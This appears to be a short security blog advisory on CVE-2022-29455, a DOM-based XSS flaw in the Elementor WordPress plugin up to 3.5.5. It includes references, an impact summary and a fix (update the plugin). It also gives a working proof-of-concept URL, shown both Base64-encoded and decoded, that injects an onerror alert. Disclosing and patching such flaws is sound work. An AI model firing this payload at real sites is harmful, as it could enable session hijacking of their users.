CVE 2022-29455 is still affecting millions of WordPress sites

– The DOM-based Reflected Cross-Site Scripting (XSS) vulnerability is in Elementor’s Elementor Website Builder plugin <= 3.5.5 versions.
  This issue leads to: CVE 2022-29455

4websecurity.com already reported the vulnerability to tens of thousands websites that are using WordPress and this version of the plugin.

 Reference:
    – https://nvd.nist.gov/vuln/detail/CVE-2022-29455
    – https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor
    – https://www.rotem-bar.com/elementor

POC (Proof Of Concept):

The payload is Base64 encoded:

https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=

Decoded from Base64:

https://example.com/#elementor-action:action=lightbox&settings={“type”:”video”,”url”:”http://”,”videoType”:”hosted”,”videoParams”:{“onerror”:”alert(document.domain)”}}

Impact:

XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. The most severe XSS attacks involve disclosure of the user’s session cookie, allowing an attacker to hijack the user’s session and take over the account.

Fix: Update the Plugin to latest version!

Alex,

4websecurity.com

Leave a Reply